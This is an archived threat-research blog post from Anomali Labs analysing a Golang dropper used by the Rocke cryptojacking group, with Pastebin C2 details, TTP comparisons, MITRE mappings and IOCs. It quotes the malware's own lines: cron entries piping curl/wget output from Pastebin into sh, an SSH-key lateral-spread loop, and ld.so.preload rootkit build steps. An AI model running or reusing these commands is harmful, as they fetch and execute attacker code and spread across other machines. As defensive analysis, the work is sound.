Rocke Evolves Its Arsenal With a New Malware Family Written in
Golang | Anomali Labs
By Anomali Threat Research
Archived: 2026-04-05 13:04:58 UTC
The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how
they’re stealing your cycles.
SummaryIntroductionTechnical DetailsOverlapping TTPs with previous campaignsConclusionMitre
ATT&CKIOCsEndnotes
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 1 of 8

Summary
The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how
they’re stealing your cycles. Rocke is actively updating and pushing a new dropper using Pastebin for Command
and Control (C2). Recent updates to the C2 as of March 13th, 2019 have been seen, which leads researchers to
believe this campaign is ongoing. According to VirusTotal, the threat detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use “ld.so.preload” function to hook libc
functions. The hooking is used to hide the dropper and the mining software installed by the malware and prevents
it from showing up in the “currently running” process list. This tactic is being utilized by the group in this new
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 2 of 8

campaign. The miner uses a private mining pool hosted on DigitalOcean which is a change in the threat actor’s
previous tactics.
Introduction
The threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo
Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which
the group utilized a malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On
March 12th, 2019, Anomali Research has, with high confidence, identified a new active campaign that we believe
is being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner
onto a machine to mine Monero cryptocurrency. This ongoing campaign has extensive Tactics Techniques and
Procedures (TTPs) that overlap with the report published by Unit 42.
This campaign is different from prior activity because a new dropper was observed being used by Rocke that is
written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that
only one engine successfully detected it as malicious. The low detection rate of the malware coupled with the
techniques that prevent the Rocke malicious processes from showing up in the running processes of victim
machines, raises the possibility that this campaign has been successfully running for weeks.
Scanning results from VirusTotal for one of the malware samples
Figure 1: Scanning results from VirusTotal for one of the malware samples.
Technical Details
Analysis of the Dropper
The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided
by the UPX project. Instead of having the “UPX!” string, it has been replaced with “LSD!”. Repairing the header
is needed to unpack the samples using the unpacker provided by the UPX team.
The dropper is written in Go (Golang) and the estimated source code structure, based on the decompiler, is shown
below:
 Package main: /root/go/src/github.com/hippies/LSD File: main.go goatt Lines: 12 to 17 (5)
The main execution process can be summarized in the following steps:
1. Delete “/etc/ld.so.preload” if it exists
2. Get the PID of the process and writes it to “/tmp/.lsdpid”
3. Uses “chattr -i” to mark the PID file protected so it cannot be modified
4. Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”
5. Turns the modified time stamp on the moved file back 416 days
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 3 of 8

6. Installs an “init.d” startup script to “/etc/init.d/netdns” and a systemd service script to
“/usr/lib/systemd/system/netdns.service”; the modified time is also changed for these files in the same way
7. Enabling the service on the compromised system by executing: “chkconfig --add netdns” and “systemctl
enable netdns”
8. Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”
9. Writes code to “/usr/local/lib/libcset.c”
10. Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”
11. If GCC is not installed it tries to install it and recompile “yum -y install gcc -y||apt-get -y install gcc”
12. Adds the path to the shared object to “/etc/ld.so.preload” and protects the file from modifications
13. Persistence is added through Cron by executing echo "*/10 * * * * (curl -fsSL
https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - and by
adding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O-https://pastebin.com/raw/yPRSa0ki)|sh” to  “/var/spool/cron/crontabs/root”
14. Checking for updates by checking the version listed at “https://pastebin.com/raw/HWBVXK6H”
15. Installs the Monero miner at “/tmp/kintegrityds” and protects it
16. The miner connects to a private pool hosted on DigitalOcean with IP and port of: 134.209.104.20:51640
The malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to
determine the machines external host so it does not attack itself.
Command and Control
The malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is
used to check for the latest version of the malware. If a new version is available, the malware reaches out to
“https://pastebin[.]com/yPRSa0ki”. The paste shown below serves as a redirect to the actual setup stript.
 (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's
The setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the
threat actors’ malware instead. It will also try to use known SSH hosts and the SSH key on the machine to spread
latterly.
 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo "*/10 * * * * (curl -fsSL https
The Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were
added on February 24th, 2019.
Pastebin profile used by the threat actor
Figure 2: Pastebin profile used by the threat actor
The server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below.
The page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 4 of 8

Image hosting site from where the malware is downloaded from
Figure 3: Image hosting site from where the malware is downloaded from.
According to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is
also registered by the same email (4592248@gmail[.]com) as another domain that was used in an earlier Rocke
campaign which indicates that it is likely the site is controlled by the threat group.[3]
 Domain Name: SOWCAR.COM Registry Domain ID: 2277522871_DOMAIN_COM-VRSN Registrar WHOIS Server
Overlapping TTPs with previous campaigns
The current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both
campaigns, the group uses Pastebin for C2 and the C2 system depends on 3 public pastes. One paste serves the
latest version, one acts as a redirect to the third that is used to initialize the infection. The redirect uses either
“cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh”
after some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a
similar pattern. In this campaign the username is “SYSTEMTEN” while last campaign username was
“SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.
The filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to
download the payload in this campaign and the campaign reported by Unit 42. The filenames have the same
structure, with some of the numbers overlapping.
 http://sowcar.com/t6/678/1552060180x1822611359.jpg https://master.minerxmr.ru/2/1551434778x272832903
The malware uses cron for persistence. The similar crontab entries are shown below. The only difference between
the entries are the ID of paste used.
Cron jobs created by the Python version of the malware:
 "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/
Cron jobs created by the Go version of the malware:
 */10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/ra
In this campaign, the threat actor also uses “init” and “systemd” services for persistence. The name of the service
is “netdns.” Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the
serviced called netdns. After the file is created, the access and modified time is changed before the file is marked
as non-modifiable. The same technique is used by the new malware written in Go.
 curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 5 of 8

The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The
malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are
code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh
keys and known hosts if they are available to infect other machines.
Last campaign
 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $
Current campaign
 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{
In addition to the propagation over SSH, the new malware tries to compromise Redis servers just like the Python-based malware.
There is also overlap of infrastructure. The email used to register the sowcar[.]com domain also registered
thyrsi[.]com. This domain was reported on and linked to the same threat group in a report by Cisco Talos in
December 2018. The domains registered by this email address is shown in the figure below.
Domains registered by the same email address
Figure 4: Domains registered by the same email address.
Conclusion
Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed
from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly
non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected.
Mitre ATT&CK
T1190 Exploit Public-Facing Application
T1078 Valid Accounts
T1168 Local Job Scheduling
T1110 Brute Force
T1222 File Permissions Modification
T1021 Remote Services
T1064 Scripting
T1045 Software Packing
T1071 Standard Application Layer Protocol
T1099 Timestomp
T1055 Process Injection
T1036 Masquerading
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 6 of 8

IOCs
URLS
 https://pastebin[.]com/raw/yPRSa0ki https://pastebin[.]com/raw/wDBa7jCQ https://pastebin[.]com/raw/D
SHA256
 029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd 93efdee9def596b93517699958e7a5c3f0b
Mining pool
134.209.104.20:51640
Endnotes
David Liedenberg, “Rocke: The Champion of Monero Miners,” Talos Blog, accessed March 14, 2019,
published August 30, 2018.
Xingyu Jin and Claud Xiao, “Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud
Security Products,” Palo Alto Networks, accessed March 14, 2019, published January 17, 2019.
David Liebenberg and Andrew Williams, “Connecting the dots between recently active cryptominers,”
Talos Blog, accessed March 14, 2019, published December 18, 2018.
Iran’s IRGC Names Western Tech Giants as “Legitimate Targets”: What CISOs Must Do Now
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 7 of 8

When 766 Systems Fall in 24 Hours: The Threats Bearing Down on State Government Networks
The Iran Cyber Threat Machine Isn’t Slowing Down — Here’s What CISOs Need to Know Now
Source: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Page 8 of 8

  https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang    
When 766 Systems Fall in 24 Hours: The Threats Bearing Down on State Government Networks
The Iran Cyber Threat Machine Isn’t Slowing Down-Here’s What CISOs Need to Know Now
Source: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang      
   Page 8 of 8